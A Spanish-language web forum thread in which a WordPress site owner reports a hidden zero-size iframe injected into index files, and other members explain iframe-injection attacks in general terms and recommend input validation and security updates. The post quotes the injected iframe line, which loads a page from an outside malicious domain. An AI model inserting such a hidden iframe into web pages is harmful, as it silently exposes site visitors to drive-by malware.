Me habrán hackeado mis archivos index.html index.php?

Hola a todos nada más aquí queriendoles consultar al respecto.

Fijense que hace poco estuve revisando mi servidor y puesto que manejo un archivo index.html para ponerlo con el mensaje de \'en mantenimiento\' para cuando actualizo mi wordpress, pues me di cuenta al bajarlo y querer modificar el código, que de alguna manera se había insertado el código:

Código :

<iframe border=\"0\" frameborder=\"no\" src=\"http://nudeteens.in/4/index.php\" width=\"0\" height=\"0\"></iframe>

Luego revise por las dudas el archivo index.php (de wordpress) instalado en la raíz de mi sitio y tambien aparecía ese código. Que yo recuerde, no he hecho esos cambios y no entiendo como pudo insertarse ese código en mis archivos index. Mis archivos por lo general tienen 644 en los permisos CHMOD pero en vista de esa situación ahora los he cambiado (al menos los indexes) a 444.

Me podrían regalar su opinión al respecto de lo que pudo haber pasado, si les ha pasado algo similar a ustedes, y si me podrían dar algunos concejos de seguridad en mi servidor, y desde ya se los agradeceré.

El ataque via iframe es bastante popular, y a poco que busques en google encontrarás unas cuantas referencias. Aquí por ejemplo una lista de acciones a tomar: http://extremesecurity.blogspot.com/2008/03/iframe-attacks-actions-to-be-taken.html

Jorge

Esa nota está muy bien, aunque me parece un tanto ambigua pero sirve mucho, ahora sé que es un ataque por medio de iframe. Muchas gracias por el comentario solisarg, pero me he quedado con la duda, acaso establecer el permisos a 444 no ayuda??

Se trata de ganar derechos buscando scripts que pertenezcan al grupo ... léete las notas, ojalá fuera tan fácil como solo setear derechos de escritura

Jorge

Esto...
¿Podría preguntar cómo se realizan esos ataques?
¿Cómo consiguen embeber un código, el que sea, en una página, sin tener acceso al user/password?
Es que mis conocimientos de inglés... no me dan para entender muy bien la referencia propuesta...
¿Sabrías explicarlo, aunque fuera "por encima"?


Gracias... y perdona por intentar aprovecharme de los conocimientos que te supongo.

Bueno, supones demasiado, pero brevemente la historia es así. Primero: buscas sitios donde puedas ejecutar un ataque de SQL Injection (no el obvio de borrar entradas o cosas gruesas como esas) sino de meter JavaScript para ejecutar un script remoto (hay cadenas específicas en los buscadores que te dan pistas de sitios atacables). Luego ese script ataca el browser o sistema operativo casi siempre por desbordamiento de buffer para ejecutar código directamente en lo que cargas, apareciendo los iframes. Luego con un poco más de paciencia, desde una máquina infectada vas agregando tu cadena a todo lo que el usuario toca, si eres webmaster, touché

Jorge

Con lo que te "supuse", se vió suficiente.
Gracias por la explicación.
Al parecer... el problema es el de siempre:
¿verdad?

Pues creo que no acabo de entender, pero me da la impresión de que la máquina de abcmario esta infectada con algún tipo de virus que agrega iframes a las páginas que edita, y que se contagió precisamente por alguno de estos iframe. ¿Es así?

Sip, siempre se trata de validar bien los datos, que es la puerta de entrada. Puede que el navegador esté infectado, pero el ataque tiene muchas variantes. Yo mismo en el sitio que dirijo tuve la misma infección un par de veces. En cualquier caso, si se usan sistemas ampliamente conocidos (por ejemplo phpbb o cualquier sistema popular de blog) hay que estar al loro de las actualizaciones de seguridad, porque cada tanto alguien encuentra el agujero (SIEMPRE hay un agujero, es como el juego del gato y el ratón) y hay que correr a tapar

Jorge